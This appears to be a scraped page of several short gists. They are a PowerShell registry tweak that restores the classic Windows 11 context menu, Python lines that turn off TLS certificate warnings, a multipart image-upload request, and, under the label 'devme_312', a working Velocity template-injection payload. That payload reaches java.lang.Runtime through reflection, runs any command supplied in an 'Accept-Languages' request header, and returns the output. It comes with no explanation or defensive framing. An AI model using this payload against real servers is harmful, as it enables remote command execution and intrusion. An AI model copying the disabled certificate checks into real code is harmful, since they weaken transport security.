This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Windows 11 - Show more options | |
# PS Command below edit registry to show the full classic context menu by default in exporer | |
New-Item -Path "HKCU:\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" -Force | Out-Null | |
Set-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" -Name "(Default)" -Value "" | |
Stop-Process -Name explorer -Force | |
# Reverse that change | |
Remove-Item -Path "HKCU:\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}" -Recurse -Force | |
Stop-Process -Name explorer -Force |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
devme_312 | |
#set($x='') | |
#set($rt=$x.class.forName('java.lang.Runtime')) | |
#set($is=$x.class.forName('java.io.InputStream')) | |
#set($sn=$x.class.forName('java.util.Scanner')) | |
#set($str=$x.class.forName('java.lang.String')) | |
#set($ex=$rt.getRuntime().exec($request.getHeader('Accept-Languages'))) | |
$ex.waitFor() | |
#set($out=$sn.getConstructor($is).newInstance($ex.getInputStream()).useDelimiter('\A').next()) | |
$str.valueOf($out) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVYxAOx39qBmyGqDt | |
------WebKitFormBoundaryVYxAOx39qBmyGqDt | |
Content-Disposition: form-data; name="name"; filename="test.png" | |
Content-Type: image/png | |
content | |
------WebKitFormBoundaryVYxAOx39qBmyGqDt | |
Content-Disposition: form-data; name="submit" |